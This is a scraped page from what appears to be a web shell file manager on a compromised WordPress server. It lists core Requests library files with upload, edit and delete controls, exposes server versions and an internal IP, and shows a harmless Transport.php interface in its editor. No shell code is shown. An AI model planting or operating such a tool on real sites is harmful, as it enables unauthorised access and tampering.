[ SYSTEM ]: Linux wordpress 6.1.0-41-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.158-1 (2025-11-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-includes
/
Requests
/
src
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 Auth
SET
[ DEL ]
📁 Cookie
SET
[ DEL ]
📁 Exception
SET
[ DEL ]
📁 Proxy
SET
[ DEL ]
📁 Response
SET
[ DEL ]
📁 Transport
SET
[ DEL ]
📁 Utility
SET
[ DEL ]
📄 Auth.php
860 B
SET
[ EDIT ]
|
[ DEL ]
📄 Autoload.php
9,335 B
SET
[ EDIT ]
|
[ DEL ]
📄 Capability.php
652 B
SET
[ EDIT ]
|
[ DEL ]
📄 Cookie.php
15,389 B
SET
[ EDIT ]
|
[ DEL ]
📄 Exception.php
1,114 B
SET
[ EDIT ]
|
[ DEL ]
📄 HookManager.php
709 B
SET
[ EDIT ]
|
[ DEL ]
📄 Hooks.php
3,032 B
SET
[ EDIT ]
|
[ DEL ]
📄 IdnaEncoder.php
12,435 B
SET
[ EDIT ]
|
[ DEL ]
📄 Ipv6.php
5,639 B
SET
[ EDIT ]
|
[ DEL ]
📄 Iri.php
29,622 B
SET
[ EDIT ]
|
[ DEL ]
📄 Port.php
1,505 B
SET
[ EDIT ]
|
[ DEL ]
📄 Proxy.php
867 B
SET
[ EDIT ]
|
[ DEL ]
📄 Requests.php
34,001 B
SET
[ EDIT ]
|
[ DEL ]
📄 Response.php
4,281 B
SET
[ EDIT ]
|
[ DEL ]
📄 Session.php
9,107 B
SET
[ EDIT ]
|
[ DEL ]
📄 Ssl.php
5,425 B
SET
[ EDIT ]
|
[ DEL ]
📄 Transport.php
1,544 B
SET
[ EDIT ]
|
[ DEL ]
📄 database.php
943 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: Transport.php
<?php /** * Base HTTP transport * * @package Requests\Transport */ namespace WpOrg\Requests; /** * Base HTTP transport * * @package Requests\Transport */ interface Transport { /** * Perform a request * * @param string $url URL to request * @param array $headers Associative array of request headers * @param string|array $data Data to send either as the POST body, or as parameters in the URL for a GET/HEAD * @param array $options Request options, see {@see \WpOrg\Requests\Requests::response()} for documentation * @return string Raw HTTP result */ public function request($url, $headers = [], $data = [], $options = []); /** * Send multiple requests simultaneously * * @param array $requests Request data (array of 'url', 'headers', 'data', 'options') as per {@see \WpOrg\Requests\Transport::request()} * @param array $options Global options, see {@see \WpOrg\Requests\Requests::response()} for documentation * @return array Array of \WpOrg\Requests\Response objects (may contain \WpOrg\Requests\Exception or string responses as well) */ public function request_multiple($requests, $options); /** * Self-test whether the transport can be used. * * The available capabilities to test for can be found in {@see \WpOrg\Requests\Capability}. * * @param array<string, bool> $capabilities Optional. Associative array of capabilities to test against, i.e. `['<capability>' => true]`. * @return bool Whether the transport can be used. */ public static function test($capabilities = []); }